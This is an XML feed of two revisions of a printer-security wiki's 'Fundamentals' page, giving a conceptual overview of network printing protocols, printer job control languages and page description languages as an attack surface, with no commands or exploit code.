The network printing protocol acts as a channel to deploy print jobs which either contain the page description language directly or first invoke a printer/job control language to change settings like paper trays. From a security point of view this encapsulation is interesting, especially because functionality is overlapping. For example an – each time different – username can be set in [[IPP]], [[PJL]] and [[PostScript]]. If something is restricted in one layer, it may be allowed in the next one. While network printing protocols are discussed in this wiki, the focus is mainly on printer languages, particularly PJL and PostScript.&lt;br /&gt;
&lt;br /&gt;
== Network printing protocols ==&lt;br /&gt;
&lt;br /&gt;
Sending data to a printer device can be done by [[USB_drive_or_cable|USB]]/parallel cable or over a network. This wiki focuses on network printing but most of the presented attacks can also be performed against local printers. There are various exotic protocols for network printing like Novell's [https://en.wikipedia.org/wiki/NetWare_Core_Protocol NCP] or [https://en.wikipedia.org/wiki/AppleTalk AppleTalk]. In the Windows world, [[SMB]]/CIFS printer shares have become quite popular. Furthermore, some devices support printing over generic protocols such as [https://en.wikipedia.org/wiki/File_Transfer_Protocol FTP] or [https://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol HTTP] file uploads. The most common printing protocols supported directly by network printers however are [[LPD]], [[IPP]], and [[Raw|raw port 9100]] printing. Network printing protocols can be attacked directly, for example by exploiting a [[Buffer overflows#LPD daemon|buffer overflow]] in the printer's LPD daemon. In many attack scenarios however, they only act as a '''carrier/channel''' to deploy malicious [[Printer language]] code. Note that a network printer usually supports multiple protocols to ‘print’ a document which broadens the attack surface.&lt;br /&gt;
&lt;br /&gt;
→ ''Related articles:'' [[LPD]], [[IPP]], [[Raw]], [[SMB]]&lt;br /&gt;
&lt;br /&gt;
== Printer Control Languages ==&lt;br /&gt;
&lt;br /&gt;
A job control language manages settings like output trays for the current print job. While it usually sits as an optional layer in-between the printing protocol and the page description language, functions may be overlapping. Examples of vendor-specific job control languages are [http://www.undocprint.org/formats/printer_control_languages/cpca CPCA], [http://www.undocprint.org/formats/printer_control_languages/xjcl XJCL], [http://www.undocprint.org/formats/printer_control_languages/ejl EJL] and [[PJL]] – which is supported by a variety of printers and will be discussed below. In addition, printer control and management languages are designed to affect not only a single print job but the device as a whole. One approach to define a common standard for this task was [http://www.undocprint.org/formats/printer_control_languages/npap NPAP]. However, it has not established itself and is only supported by Lexmark. Other printer manufacturers instead use [[SNMP]] or its PJL-based metalanguage [[PML]].&lt;br /&gt;
&lt;br /&gt;
→ ''Related articles:'' [[PJL]], [[PML]], [[SNMP]], [[UEL]]&lt;br /&gt;
&lt;br /&gt;
== Page Description Languages ==&lt;br /&gt;
&lt;br /&gt;
A page description language (PDL) specifies the appearance of the actual document. It must however be pointed out that some PDLs offer limited job control, so a clear demarcation between page description and printer/job control language is not always possible. The function of a ‘printer driver’ is to translate the file to be printed into a PDL that is understood by the printer model. Note that some low cost inkjet printers do not support any high level page description language at all. So called host-based or [https://en.wikipedia.org/wiki/Graphics_Device_Interface#GDI_printers GDI] printers only accept simple bitmap datastreams like [http://www.undocprint.org/formats/page_description_languages/zjstream ZJS] while the actual rendering is done by the printer driver. There are various proprietary page description languages like Kyocera's [http://www.undocprint.org/formats/page_description_languages/prescribe PRESCRIBE], [http://www.undocprint.org/formats/page_description_languages/spl SPL], [http://www.undocprint.org/formats/page_description_languages/xes XES], [http://www.undocprint.org/formats/page_description_languages/capsl CaPSL], [http://www.undocprint.org/formats/page_description_languages/rpcs RPCS], [https://en.wikipedia.org/wiki/ESC/P ESC/P] which is mostly used in dot matrix printers or [https://en.wikipedia.org/wiki/HPGL HP-GL] and [https://en.wikipedia.org/wiki/HPGL#HP-GL.2F2 HP-GL/2] which have been designed for plotters. Support for direct [https://en.wikipedia.org/wiki/Portable_Document_Format PDF] and [https://en.wikipedia.org/wiki/Open_XML_Paper_Specification XPS] printing is also common on newer printers. The most common ‘standard’ page description languages however are [[PostScript]] and [[PCL]].&lt;br /&gt;
&lt;br /&gt;
→ ''Related articles:'' [[PCL]], [[PostScript]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
-----------&lt;/div&gt;</summary>
		<author><name>84.153.135.37</name></author>	</entry>

	<entry>
		<id>http://hacking-printers.net/wiki/index.php?title=Fundamentals&amp;diff=294</id>
		<title>Fundamentals</title>
		<link rel="alternate" type="text/html" href="http://hacking-printers.net/wiki/index.php?title=Fundamentals&amp;diff=294"/>
				<updated>2017-01-31T07:43:07Z</updated>
		
		<summary type="html">&lt;p&gt;84.153.135.37: /* Network printing protocols */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Typical printers range from classical [https://en.wikipedia.org/wiki/Dot_matrix_printing dot matrix] to [https://en.wikipedia.org/wiki/Inkjet_printing inkjet] or [https://en.wikipedia.org/wiki/Laser_printing laser] printers used at home or in corporate environments. The printing '''hardware''' is not addressed in detail in this wiki as from a security perspective it seems less relevant &amp;lt;ref&amp;gt;Even though some newspapers claimed hackers could set laser printers on fire by [http://www.wired.com/2011/12/hp-printer-lawsuit/ overheating] them.&amp;lt;/ref&amp;gt;. This page aims to give an introduction to fundamental '''software''' printing technologies, including network printing protocols, printer control and page description languages.&lt;br /&gt;
&lt;br /&gt;
== High-level overview ==&lt;br /&gt;
&lt;br /&gt;
Sending a document to a network printer may involve various protocols and languages. A schematic relationship regarding the encapsulation of printer languages is given below.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[File:Protocols.png|500px|Encapsulation of printer languages]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The network printing protocol acts as a channel to deploy print jobs which either contain the page description language directly or first invoke a printer/job control language to change settings like paper trays. From a security point of view this encapsulation is interesting, especially because functionality overlaps between the layers. For example, a username – a different one each time – can be set in [[IPP]], [[PJL]] and [[PostScript]]. If something is restricted in one layer, it may be allowed in the next one. While network printing protocols are discussed in this wiki, the focus is mainly on printer languages, particularly PJL and PostScript.&lt;br /&gt;
&lt;br /&gt;
== Network printing protocols ==&lt;br /&gt;
&lt;br /&gt;
Sending data to a printer device can be done by [[USB_drive_or_cable|USB]]/parallel cable or over a network. This wiki focuses on network printing but most of the presented attacks can also be performed against local printers. There are various exotic protocols for network printing like Novell's [https://en.wikipedia.org/wiki/NetWare_Core_Protocol NCP] or [https://en.wikipedia.org/wiki/AppleTalk AppleTalk]. In the Windows world, [[SMB]]/CIFS printer shares have become quite popular. Furthermore, some devices support printing over generic protocols such as [https://en.wikipedia.org/wiki/File_Transfer_Protocol FTP] or [https://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol HTTP] file uploads. The most common printing protocols supported directly by network printers however are [[LPD]], [[IPP]], and [[Raw|raw port 9100]] printing. Network printing protocols can be attacked directly, for example by exploiting a [[Buffer overflows#LPD daemon|buffer overflow]] in the printer's LPD daemon. In many attack scenarios however, they only act as a '''carrier/channel''' to deploy malicious [[Printer language]] code. Note that a network printer usually supports multiple protocols to ‘print’ a document which broadens the attack surface.&lt;br /&gt;
&lt;br /&gt;
→ ''Related articles:'' [[LPD]], [[IPP]], [[Raw]], [[SMB]]&lt;br /&gt;
&lt;br /&gt;
== Printer Control Languages ==&lt;br /&gt;
&lt;br /&gt;
A job control language manages settings like output trays for the current print job. While it usually sits as an optional layer in-between the printing protocol and the page description language, functions may be overlapping. Examples of vendor-specific job control languages are [http://www.undocprint.org/formats/printer_control_languages/cpca CPCA], [http://www.undocprint.org/formats/printer_control_languages/xjcl XJCL], [http://www.undocprint.org/formats/printer_control_languages/ejl EJL] and [[PJL]] – which is supported by a variety of printers and will be discussed below. In addition, printer control and management languages are designed to affect not only a single print job but the device as a whole. One approach to define a common standard for this task was [http://www.undocprint.org/formats/printer_control_languages/npap NPAP]. However, it has not established itself and is only supported by Lexmark. Other printer manufacturers instead use [[SNMP]] or its PJL-based metalanguage [[PML]].&lt;br /&gt;
&lt;br /&gt;
→ ''Related articles:'' [[PJL]], [[PML]], [[SNMP]], [[UEL]]&lt;br /&gt;
&lt;br /&gt;
== Page Description Languages ==&lt;br /&gt;
&lt;br /&gt;
A page description language (PDL) specifies the appearance of the actual document. It must however be pointed out that some PDLs offer limited job control, so a clear demarcation between page description and printer/job control language is not always possible. The function of a ‘printer driver’ is to translate the file to be printed into a PDL that is understood by the printer model. Note that some low cost inkjet printers do not support any high level page description language at all. So called host-based or [https://en.wikipedia.org/wiki/Graphics_Device_Interface#GDI_printers GDI] printers only accept simple bitmap datastreams like [http://www.undocprint.org/formats/page_description_languages/zjstream ZJS] while the actual rendering is done by the printer driver. There are various proprietary page description languages like Kyocera's [http://www.undocprint.org/formats/page_description_languages/prescribe PRESCRIBE], [http://www.undocprint.org/formats/page_description_languages/spl SPL], [http://www.undocprint.org/formats/page_description_languages/xes XES], [http://www.undocprint.org/formats/page_description_languages/capsl CaPSL], [http://www.undocprint.org/formats/page_description_languages/rpcs RPCS], [https://en.wikipedia.org/wiki/ESC/P ESC/P] which is mostly used in dot matrix printers or [https://en.wikipedia.org/wiki/HPGL HP-GL] and [https://en.wikipedia.org/wiki/HPGL#HP-GL.2F2 HP-GL/2] which have been designed for plotters. Support for direct [https://en.wikipedia.org/wiki/Portable_Document_Format PDF] and [https://en.wikipedia.org/wiki/Open_XML_Paper_Specification XPS] printing is also common on newer printers. The most common ‘standard’ page description languages however are [[PostScript]] and [[PCL]].&lt;br /&gt;
&lt;br /&gt;
→ ''Related articles:'' [[PCL]], [[PostScript]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
-----------&lt;/div&gt;</summary>
		<author><name>84.153.135.37</name></author>	</entry>

	</feed>